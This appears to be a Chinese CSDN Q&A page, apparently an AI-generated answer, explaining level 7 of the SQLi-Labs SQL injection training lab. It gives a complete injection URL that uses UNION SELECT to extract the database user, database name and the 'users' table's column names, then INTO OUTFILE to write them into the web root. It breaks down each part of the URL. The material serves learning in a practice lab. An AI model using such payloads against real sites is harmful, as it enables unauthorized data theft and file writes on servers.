sqlilabs第七关
时间: 2023-12-26 09:00:02 浏览: 94
SQLi Labs的第七关是一个用来练习SQL注入的环境,该关卡的目标是从数据库中获取用户表的列名,并将结果写入一个文件。在这个关卡的注入语句中,使用了UNION SELECT语句来合并多个查询结果,并使用INTO OUTFILE语句将结果写入指定的文件路径。具体的注入语句如下:
```sql
http://sqli.com/Less-7/?id=1')) union select user(),database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') into outfile 'E:\\site\\phpStudy_64\\phpstudy_pro\\WWW\\sqli\\Less-7\\1.txt' --
```
该注入语句通过UNION SELECT语句将当前数据库的用户名、数据库名和用户表的列名进行了合并,并通过INTO OUTFILE语句将结果写入到指定的文件路径中。其中,group_concat(column_name)用于将列名连接成一个字符串,information_schema.columns用于获取指定表的列名,table_schema='security'表示指定的数据库名为security,table_name='users'表示指定的表名为users。最后的--用于注释掉原始的查询语句,确保注入语句能够成功执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* [SQL注入练习.rar](https://download.csdn.net/download/BROTHERYY/12550844)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
- *2* *3* [sqli-labs-----第7关](https://blog.csdn.net/wyzhxhn/article/details/127725829)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]
阅读全文